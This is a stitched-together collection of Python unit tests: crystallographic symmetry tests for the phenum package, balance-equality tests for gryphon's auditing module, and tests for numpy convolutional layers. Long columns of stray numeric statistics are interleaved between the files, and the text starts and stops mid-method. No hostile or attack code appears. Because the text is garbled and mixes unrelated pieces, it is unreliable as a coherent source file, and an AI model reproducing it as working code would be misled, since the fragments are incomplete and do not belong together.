    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.0, 0.0, 0.0])
def test_2(self):
    """Origin in the identity cell: no translation is needed."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10),
        [0.0, 0.0, 0.0])
def test_3(self):
    """Origin in the identity cell maps to itself."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.0, 0.0, 0.0])
def test_4(self):
    """Origin in the identity cell maps to itself."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10),
        [0.0, 0.0, 0.0])
def test_5(self):
    """Origin in the identity cell maps to itself."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.0, 0.0, 0.0])
def test_6(self):
    """An interior point [0.25, 0.25, 0.75] of the identity cell is
    returned unchanged."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.25, 0.25, 0.75], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.25, 0.25, 0.75])
def test_7(self):
    """Origin in the identity cell maps to itself."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10),
        [0.0, 0.0, 0.0])
def test_8(self):
    """Interior point [0.25, 0.25, 0.75] stays fixed in the identity
    cell."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.25, 0.25, 0.75], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.25, 0.25, 0.75])
def test_9(self):
    """Origin in the identity cell maps to itself."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.0, 0.0, 0.0], to_latt, to_cart, 1e-10)
    self.assertEqual(result, [0.0, 0.0, 0.0])
def test_10(self):
    """Interior point [0.25, 0.25, 0.75] stays fixed in the identity
    cell."""
    from phenum.symmetry import bring_into_cell
    to_latt = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    to_cart = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.25, 0.25, 0.75], to_latt, to_cart, 1e-10),
        [0.25, 0.25, 0.75])
def test_11(self):
    """A point on no cell boundary of the identity lattice is unchanged."""
    from phenum.symmetry import bring_into_cell
    identity = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    result = bring_into_cell([0.5, 0.5, 0.25], identity, identity, 1e-10)
    self.assertEqual(result, [0.5, 0.5, 0.25])
def test_11b(self):
    """The origin maps to itself for the identity lattice.

    NOTE: this method was originally defined as a second ``test_11``.
    Because Python class bodies keep only the last binding of a name, the
    duplicate silently shadowed (and disabled) the earlier ``test_11``;
    renaming it lets unittest discover and run both tests.
    """
    from phenum.symmetry import bring_into_cell
    identity = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.0, 0.0, 0.0], identity, identity, 1e-10),
        [0.0, 0.0, 0.0])
def test_12(self):
    """An interior point is a fixed point of bring_into_cell (identity lattice)."""
    from phenum.symmetry import bring_into_cell
    identity = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    self.assertEqual(
        bring_into_cell([0.25, 0.25, 0.75], identity, identity, 1e-10),
        [0.25, 0.25, 0.75])
def test_13(self):
    """A mid-cell point of the identity lattice is returned unchanged."""
    from phenum.symmetry import bring_into_cell
    identity = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
    point = [0.5, 0.5, 0.25]
    self.assertEqual(
        bring_into_cell(point, identity, identity, 1e-10),
        [0.5, 0.5, 0.25])
def test_14(self):
    """The origin maps to itself for an fcc-like lattice pair."""
    from phenum.symmetry import bring_into_cell
    to_lattice = [[-1.0, 1.0, 1.0], [1.0, 1.0, -1.0], [1.0, -1.0, 1.0]]
    to_cartesian = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
    self.assertEqual(
        bring_into_cell([0.0, 0.0, 0.0], to_lattice, to_cartesian, 1e-10),
        [0.0, 0.0, 0.0])
def test_15(self):
    """The origin is a fixed point for the fcc-like lattice pair.

    NOTE(review): this repeats test_14 with identical inputs — presumably a
    copy-paste duplicate in the generated suite; kept as-is for behavior parity.
    """
    from phenum.symmetry import bring_into_cell
    to_lattice = [[-1.0, 1.0, 1.0], [1.0, 1.0, -1.0], [1.0, -1.0, 1.0]]
    to_cartesian = [[0.0, 0.5, 0.5], [0.5, 0.5, 0.0], [0.5, 0.0, 0.5]]
    result = bring_into_cell([0.0, 0.0, 0.0], to_lattice, to_cartesian, 1e-10)
    self.assertEqual(result, [0.0, 0.0, 0.0])
def test_16(self):
    """A point inside a skewed (non-orthogonal) cell is returned unchanged."""
    from phenum.symmetry import bring_into_cell
    to_lattice = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
    to_cartesian = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
    self.assertEqual(
        bring_into_cell([1.0, 0.0, 1.0], to_lattice, to_cartesian, 1e-3),
        [1.0, 0.0, 1.0])
def test_17(self):
    """A second interior point of the skewed cell is a fixed point."""
    from phenum.symmetry import bring_into_cell
    to_lattice = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
    to_cartesian = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
    result = bring_into_cell([2.0, 0.0, 2.0], to_lattice, to_cartesian, 1e-3)
    self.assertEqual(result, [2.0, 0.0, 2.0])
def test_18(self):
    """Result carries the exact floating-point round-off of the transform."""
    from phenum.symmetry import bring_into_cell
    to_lattice = np.transpose([[1.0, -1.0, 0.1], [1.0, 1.0, -0.1], [-1.0, 1.0, 0.1]])
    to_cartesian = np.transpose([[0.5, 0.5, 0.0], [0.0, 0.5, 0.5], [5.0, 0.0, 5.0]])
    # The expected value includes one ULP of round-off from the matrix products.
    expected = [3.0000000000000004, 0.0, 3.0000000000000004]
    self.assertEqual(
        bring_into_cell([3.0, 0.0, 3.0], to_lattice, to_cartesian, 1e-3),
        expected)
def test_19(self):
    """A point outside the hexagonal cell is wrapped back inside it."""
    from phenum.symmetry import bring_into_cell
    to_lattice = np.transpose([[1.0, 0.0, 0.0],
                               [-0.5773502717125849, 1.1547005434251698, 0.0],
                               [0.0, 0.0, 0.6123724213915893]])
    to_cartesian = np.transpose([[1.0, 0.0, 0.0],
                                 [0.5, 0.8660254, 0.0],
                                 [0.0, 0.0, 1.6329932]])
    point = [0.0, 0.5779502399999998, 1.6329931599999998]
    expected = [1.0000000000000000, 0.57795023999999980, -4.0000000416390380E-008]
    self.assertEqual(bring_into_cell(point, to_lattice, to_cartesian, 1e-3), expected)
class TestGetLatticePointGroup(ut.TestCase):
    """Tests of get_lattice_pointGroup against stored reference point groups.

    Each test computes the point group of a lattice (given by its three
    basis vectors) and checks that every operation stored in the matching
    reference file appears in the computed group, up to np.allclose.
    """

    def _assert_pg_matches(self, avecs, ref_file):
        """Compare the computed point group of *avecs* to *ref_file*.

        Counts one match for every (computed, reference) pair that agrees
        within np.allclose and requires as many matches as there are
        reference operations.
        """
        from phenum.symmetry import get_lattice_pointGroup
        expected_ops = _read_pg(gpath + ref_file)
        computed_ops = get_lattice_pointGroup(avecs, 1E-6)
        matches = [True
                   for op in computed_ops
                   for ref in expected_ops
                   if np.allclose(op, ref)]
        self.assertEqual(len(expected_ops), len(matches))

    def test_getpg1(self):
        self._assert_pg_matches([[1, 1, 0], [1, 0, 1], [0, 1, 1]], "fcc_pg.out")

    def test_getpg2(self):
        self._assert_pg_matches(
            [[1, 0, 0], [0.5, -0.86602540378444, 0], [0, 0, 2]], "hex_pg.out")

    def test_getpg3(self):
        self._assert_pg_matches([[1, 0, 0], [0, 1, 0], [0, 0, 1]], "sc_pg.out")

    def test_getpg4(self):
        self._assert_pg_matches([[1, -1, 1], [-1, 1, 1], [1, 1, -1]], "bcc_pg.out")

    def test_getpg5(self):
        self._assert_pg_matches([[1, 2, 2], [2, 1, 2], [2, 2, 1]], "trig_pg.out")

    def test_getpg6(self):
        self._assert_pg_matches([[1, 0, 0], [0.15, 1, 0], [0.25, 0, 1]], "tric_pg.out")

    def test_getpg7(self):
        self._assert_pg_matches([[1, 0, 0], [0, 1, 0], [0, 0, 2]], "st_pg.out")

    def test_getpg8(self):
        self._assert_pg_matches(
            [[-0.5, 0.5, 1], [0.5, -0.5, 1], [0.5, 0.5, -1]], "bct_pg.out")

    def test_getpg9(self):
        self._assert_pg_matches([[1, 0, 0], [0, 2, 0], [0, 0, 3]], "so_pg.out")

    def test_getpg10(self):
        self._assert_pg_matches([[0.5, 1, 0], [0.5, -1, 0], [0, 0, 3]], "cco_pg.out")

    def test_getpg11(self):
        self._assert_pg_matches(
            [[-0.5, 1, 1.5], [0.5, -1, 1.5], [0.5, 1, -1.5]], "bco_pg.out")

    def test_getpg13(self):
        self._assert_pg_matches([[0.5, 1, 0], [0.5, 0, 1.5], [0, 1, 1.5]], "fco_pg.out")

    def test_getpg14(self):
        self._assert_pg_matches([[1, 0, 0], [0, 1, 0], [0.25, 0, 1]], "sm_pg.out")

    def test_getpg12(self):
        self._assert_pg_matches(
            [[0.5, 0.5, 0], [0.5, -0.5, 0], [0.25, 0, 1]], "ccm_pg.out")

    def test_getpg15(self):
        self._assert_pg_matches([[1, 1, 0], [1, 0, 1], [0, 0, 2]], "fcc2_pg.out")
class TestGetTransformations(ut.TestCase):
    """Tests of the _get_transformations subroutine.

    Each numbered case reads stored lattice vectors from disk and compares
    the computed (prim_to_cart, cart_to_prim) pair against stored outputs.
    """

    def _compare_outputs(self, out1, out2):
        """Assert element-wise near-equality of two 3x3 transform pairs."""
        for row in range(3):
            for col in range(3):
                # out[0] is prim_to_cart, out[1] is cart_to_prim.
                self.assertAlmostEqual(out1[0][row][col], out2[0][row][col])
                self.assertAlmostEqual(out1[1][row][col], out2[1][row][col])

    def _trans_out(self, case):
        """Load the stored (prim_to_cart, cart_to_prim) pair for *case*."""
        suffix = ".out." + str(case)
        ctp = np.transpose(
            _read_float_2D(gpath + "get_transformations_cart_to_prim" + suffix))
        ptc = np.transpose(
            _read_float_2D(gpath + "get_transformations_prim_to_cart" + suffix))
        return (ptc, ctp)

    def _run_case(self, case):
        """Run _get_transformations on stored inputs and compare to outputs."""
        from phenum.symmetry import _get_transformations
        aVecs = _read_float_2D(gpath + "get_transformations_aVecs.in." + str(case))
        self._compare_outputs(_get_transformations(aVecs), self._trans_out(case))

    def test_1(self):
        self._run_case(1)

    def test_2(self):
        self._run_case(2)

    def test_3(self):
        self._run_case(3)

    def test_4(self):
        self._run_case(4)

    def test_5(self):
        self._run_case(5)

    def test_6(self):
        self._run_case(6)

    def test_7(self):
        self._run_case(7)

    def test_8(self):
        self._run_case(8)

    def test_9(self):
        self._run_case(9)

    def test_10(self):
        self._run_case(10)

    def test_11(self):
        self._run_case(11)

    def test_12(self):
        self._run_case(12)

    def test_13(self):
        self._run_case(13)

    def test_14(self):
        self._run_case(14)

    def test_15(self):
        self._run_case(15)

    def test_16(self):
        self._run_case(16)

    def test_17(self):
        self._run_case(17)

    def test_18(self):
        self._run_case(18)

    def test_19(self):
        self._run_case(19)

    def test_20(self):
        self._run_case(20)
class TestDoesMappingExist(ut.TestCase):
    """Tests of the _does_mapping_exist subroutine.

    Each numbered case loads stored inputs (vector, atom type, atom
    positions, type list, tolerance) and the expected boolean result from
    disk, then checks _does_mapping_exist reproduces it.
    """

    def _run_case(self, case):
        """Load fixture files for *case* and verify the mapping result."""
        from phenum.symmetry import _does_mapping_exist
        prefix = gpath + "does_mapping_exist_"
        suffix = ".in." + str(case)
        v = _read_float_1D(prefix + "v" + suffix)
        this_type = _read_int(prefix + "this_type" + suffix)
        # The fixture stores positions column-major; transpose to row-major.
        atom_pos = [list(row) for row in zip(*_read_float_2D(prefix + "atom_pos" + suffix))]
        atom_types = _read_int_1D(prefix + "atomType" + suffix)
        eps = _read_float(prefix + "eps" + suffix)
        expected = _read_logical(prefix + "mapped.out." + str(case))
        self.assertEqual(_does_mapping_exist(v, this_type, atom_pos, atom_types, eps),
                         expected)

    def test_1(self):
        self._run_case(1)

    def test_2(self):
        self._run_case(2)

    def test_3(self):
        self._run_case(3)

    def test_4(self):
        self._run_case(4)

    def test_5(self):
        self._run_case(5)

    def test_6(self):
        self._run_case(6)

    def test_7(self):
        self._run_case(7)

    def test_8(self):
        self._run_case(8)

    def test_9(self):
        self._run_case(9)

    def test_10(self):
        self._run_case(10)

    def test_11(self):
        self._run_case(11)

    def test_12(self):
        self._run_case(12)

    def test_13(self):
        self._run_case(13)

    def test_14(self):
        self._run_case(14)

    def test_15(self):
        self._run_case(15)

    def test_16(self):
        self._run_case(16)

    def test_17(self):
        self._run_case(17)

    def test_18(self):
        self._run_case(18)

    def test_19(self):
        self._run_case(19)

    def test_20(self):
        self._run_case(20)
| 55.991903
| 7,014
| 0.54739
| 12,737
| 69,150
| 2.799796
| 0.020099
| 0.145818
| 0.182468
| 0.197415
| 0.843386
| 0.839012
| 0.828664
| 0.822299
| 0.794453
| 0.766019
| 0
| 0.158827
| 0.236905
| 69,150
| 1,234
| 7,015
| 56.037277
| 0.51698
| 0.003977
| 0
| 0.831731
| 0
| 0
| 0.082534
| 0.079702
| 0
| 0
| 0
| 0
| 0.074038
| 1
| 0.108654
| false
| 0
| 0.1
| 0
| 0.225
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
965af649b5dd3520e2d2eb2bdb61b3c9f672b379
| 4,236
|
py
|
Python
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 1,109
|
2019-06-20T19:23:27.000Z
|
2022-03-20T14:03:43.000Z
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 63
|
2019-06-21T05:36:17.000Z
|
2021-05-26T21:08:15.000Z
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 181
|
2019-06-20T19:42:05.000Z
|
2022-03-21T13:05:13.000Z
|
"""
Tests for gryphon.execution.auditing.
"""
import pyximport; pyximport.install()
import gryphon.lib; gryphon.lib.prepare()
import unittest
import sure
from gryphon.execution.lib import auditing
from gryphon.lib.money import Money
from gryphon.lib.models.exchange import Balance
class TestAuditing(unittest.TestCase):
    """Unit tests for auditing.balance_equality."""

    def _check(self, db_balance, ledger_balance, expected):
        """Assert that balance_equality(db, ledger) yields *expected*."""
        auditing.balance_equality(db_balance, ledger_balance).should.equal(expected)

    def test_trivial(self):
        """Two empty balances compare equal."""
        self._check(Balance(), Balance(), True)

    def test_symmetric_equal(self):
        """Identical two-currency balances compare equal."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        ledger = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        self._check(db, ledger, True)

    def test_symmetric_not_equal(self):
        """A one-dollar USD discrepancy makes the balances unequal."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        ledger = Balance({'USD': Money('51', 'USD'), 'BTC': Money('0', 'BTC')})
        self._check(db, ledger, False)

    def test_symmetric_very_not_equal(self):
        """Large discrepancies in both currencies make the balances unequal."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        ledger = Balance({
            'USD': Money('-60', 'USD'),
            'BTC': Money('100', 'BTC'),
        })
        self._check(db, ledger, False)

    def test_complex_symmetric_equal(self):
        """Identical four-currency balances compare equal."""
        db = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('0', 'ETH'),
            'BTC': Money('0', 'BTC'),
        })
        ledger = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('0', 'ETH'),
            'BTC': Money('0', 'BTC'),
        })
        self._check(db, ledger, True)

    def test_complex_symmetric_not_equal(self):
        """Discrepancies in the ETH/BTC legs make the balances unequal."""
        db = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('0', 'ETH'),
            'BTC': Money('0', 'BTC'),
        })
        ledger = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('-1000', 'ETH'),
            'BTC': Money('-5000', 'BTC'),
        })
        self._check(db, ledger, False)

    def test_asymmetric_equal(self):
        """A zero-valued currency missing from one side still compares equal."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        self._check(db, Balance({'USD': Money('50', 'USD')}), True)

    def test_asymmetric_not_equal(self):
        """A USD discrepancy is detected even with asymmetric currency sets."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        self._check(db, Balance({'USD': Money('51', 'USD')}), False)

    def test_asymmetric_very_not_equal(self):
        """A large USD discrepancy is detected with asymmetric currency sets."""
        db = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
        self._check(db, Balance({'USD': Money('-10000', 'USD')}), False)

    def test_complex_asymmetric_equal(self):
        """Omitting zero-valued currencies from one side still compares equal."""
        db = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('0', 'ETH'),
            'BTC': Money('0', 'BTC'),
        })
        ledger = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
        })
        self._check(db, ledger, True)

    def test_complex_asymmetric_not_equal(self):
        """A CAD sign flip makes asymmetric balances unequal."""
        db = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('10000', 'CAD'),
            'ETH': Money('0', 'ETH'),
            'BTC': Money('0', 'BTC'),
        })
        ledger = Balance({
            'USD': Money('50', 'USD'),
            'CAD': Money('-10000', 'CAD'),
        })
        self._check(db, ledger, False)
| 33.09375
| 87
| 0.563975
| 480
| 4,236
| 4.79375
| 0.1
| 0.08605
| 0.147762
| 0.191221
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0
| 0.035231
| 0.249528
| 4,236
| 127
| 88
| 33.354331
| 0.688581
| 0.008735
| 0
| 0.659341
| 0
| 0
| 0.098114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120879
| false
| 0
| 0.076923
| 0
| 0.208791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9698e268f86e6347212d131f5ebee63f29c355a3
| 11,647
|
py
|
Python
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 1,093
|
2018-09-07T07:15:29.000Z
|
2022-03-09T16:40:42.000Z
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 30
|
2018-09-20T02:41:40.000Z
|
2022-02-10T01:37:19.000Z
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 456
|
2018-09-09T19:14:16.000Z
|
2022-03-18T16:34:53.000Z
|
import numpy as np
import pytest
from src.errors import InvalidPaddingModeError
from src.layers.convolutional import ConvLayer2D, FastConvLayer2D, \
SuperFastConvLayer2D
class TestConvLayer2D:
    """Unit tests for the reference (naive) 2D convolution layer."""

    def test_pad_symmetrical(self):
        # given
        images = np.random.rand(100, 28, 28, 3)
        # when
        out = ConvLayer2D.pad(array=images, pad=(3, 3))
        # then - zero padding grows the spatial dims but leaves the sum intact
        print(out.sum())
        print(images.sum())
        assert out.shape == (100, 34, 34, 3)
        assert abs(out.sum() - images.sum()) < 1e-8

    def test_pad_asymmetrical(self):
        # given
        images = np.random.rand(100, 28, 28, 3)
        # when
        out = ConvLayer2D.pad(array=images, pad=(3, 5))
        # then - each side grows by the per-axis pad amount
        print(out.sum())
        print(images.sum())
        assert out.shape == (100, 34, 38, 3)
        assert abs(out.sum() - images.sum()) < 1e-8

    def test_calculate_pad_width_with_valid_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='valid')
        # then - 'valid' mode never pads
        assert conv.calculate_pad_dims() == (0, 0)

    def test_calculate_pad_width_with_same_padding_symmetrical(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='same')
        # then - a 5x5 kernel needs 2 pixels of padding on each side
        assert conv.calculate_pad_dims() == (2, 2)

    def test_calculate_pad_width_with_same_padding_asymmetrical(self):
        # given
        kernels = np.random.rand(5, 7, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='same')
        # then - pad is derived per axis from the kernel extent
        assert conv.calculate_pad_dims() == (2, 3)

    def test_calculate_pad_width_with_invalid_padding_value(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        conv = ConvLayer2D(w=kernels, b=biases, padding='lorem ipsum')
        # then - unknown modes are rejected lazily, at computation time
        with pytest.raises(InvalidPaddingModeError):
            _ = conv.calculate_pad_dims()

    def test_calculate_output_dims_with_same_padding_symmetrical(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='same')
        # then - 'same' keeps spatial size, channel count follows the kernel
        assert conv.calculate_output_dims((32, 11, 11, 3)) == (32, 11, 11, 16)

    def test_calculate_output_dims_with_same_padding_asymmetrical(self):
        # given
        kernels = np.random.rand(3, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='same')
        # then
        assert conv.calculate_output_dims((32, 11, 11, 3)) == (32, 11, 11, 16)

    def test_calculate_output_dims_with_valid_padding_symmetrical(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='valid')
        # then - 'valid' shrinks each spatial dim by kernel_size - 1
        assert conv.calculate_output_dims((32, 11, 11, 3)) == (32, 7, 7, 16)

    def test_calculate_output_dims_with_valid_padding_asymmetrical(self):
        # given
        kernels = np.random.rand(3, 5, 3, 16)
        biases = np.random.rand(16)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='valid')
        # then
        assert conv.calculate_output_dims((32, 11, 11, 3)) == (32, 9, 7, 16)

    def test_calculate_output_dims_with_invalid_padding_value(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        conv = ConvLayer2D(w=kernels, b=biases, padding='lorem ipsum')
        # then
        with pytest.raises(InvalidPaddingModeError):
            _ = conv.calculate_output_dims((32, 11, 11, 3))

    def test_forward_pass_with_same_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='same')
        out = conv.forward_pass(batch, training=True)
        # then - spatial dims preserved; one activation checked by hand
        assert out.shape == (16, 11, 11, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 2, 2, 0]) < 1e-8

    def test_forward_pass_with_valid_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='valid')
        out = conv.forward_pass(batch, training=True)
        # then - no padding, so the hand-computed value sits at the corner
        assert out.shape == (16, 7, 7, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 0, 0, 0]) < 1e-8

    def test_forward_pass_with_invalid_padding_value(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = ConvLayer2D(w=kernels, b=biases, padding='lorem ipsum')
        # then
        with pytest.raises(InvalidPaddingModeError):
            _ = conv.forward_pass(batch, training=True)

    def test_backward_pass_only_size_same_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = ConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                           b=np.random.rand(16), padding='same')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then - the input gradient mirrors the input's shape
        assert grads.shape == batch.shape

    def test_backward_pass_only_size_valid_padding(self):
        # given
        batch = np.random.rand(64, 11, 11, 3)
        conv = ConvLayer2D(w=np.random.rand(5, 5, 3, 16),
                           b=np.random.rand(16), padding='valid')
        # when
        grads = conv.backward_pass(conv.forward_pass(batch, training=True))
        # then
        assert grads.shape == batch.shape
class TestFastConvLayer2D:
    """Same forward/backward contract checks, run against the faster layer."""

    def test_forward_pass_with_same_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = FastConvLayer2D(w=kernels, b=biases, padding='same')
        out = conv.forward_pass(batch, training=True)
        # then - spatial dims preserved; one activation checked by hand
        assert out.shape == (16, 11, 11, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 2, 2, 0]) < 1e-8

    def test_forward_pass_with_valid_padding(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = FastConvLayer2D(w=kernels, b=biases, padding='valid')
        out = conv.forward_pass(batch, training=True)
        # then - no padding, so the hand-computed value sits at the corner
        assert out.shape == (16, 7, 7, 16)
        expected = np.sum(kernels[:, :, :, 0] * batch[0, 0:5, 0:5, :]) + biases[0]
        assert abs(expected - out[0, 0, 0, 0]) < 1e-8

    def test_forward_pass_with_invalid_padding_value(self):
        # given
        kernels = np.random.rand(5, 5, 3, 16)
        biases = np.random.rand(16)
        batch = np.random.rand(16, 11, 11, 3)
        # when
        conv = FastConvLayer2D(w=kernels, b=biases, padding='lorem ipsum')
        # then
        with pytest.raises(InvalidPaddingModeError):
